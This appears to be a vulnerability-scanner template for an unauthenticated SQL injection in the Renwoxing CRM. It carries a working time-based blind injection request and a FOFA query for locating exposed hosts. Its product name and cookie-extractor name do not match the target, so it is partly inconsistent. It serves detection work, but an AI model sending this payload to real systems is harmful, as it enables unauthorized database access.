## id: VEID-2025-0117
## name: 任我行协同CRM普及版viewaccountBase存在SQL注入漏洞
## author: hack007x
## severity: critical
## tags: veid,sql,veid2025
## description: 任我行CRM是CRM（客户关系管理）、OA（自动化办公）、OM（目标管理）、KM（知识管理）、HR（人力资源）一体化的企业管理软件。通过建立组织运营管理铁三角（目标行动-企业文化-知识复制），一切围绕以客户为中心的全方位、透明化业务管理（市场-销售-生产-服务），打造企业组织高效协同的运营管理平台。任我行协同CRM存在SQL注入漏洞，远程未授权攻击者可利用此漏洞获取敏感信息，进一步利用可能获取目标系统权限。
## affects: 任我行协同CRM
## fofa-query: app="任我行软件-管家婆分销ERP"
## verification: true


GET /common/viewaccountBase.asp?TimeCheckPoint=80685.73&billnumberid=-1%20waitfor%20delay%20%270:0:8%27--&billtype= HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}


#@ condition: and
#@ matcher: status_code == 500
#@ matcher: body contains "Microsoft"
#> extract: name=ruijie_cookie, from=header["Set-Cookie"], regex=([^;]+)/, group=1, internal=true





# @VEIL-STAMP: dfe26873c79872e89a2d83ed338db697bce2c3b0fbb2232a73347b494f1d1ef7
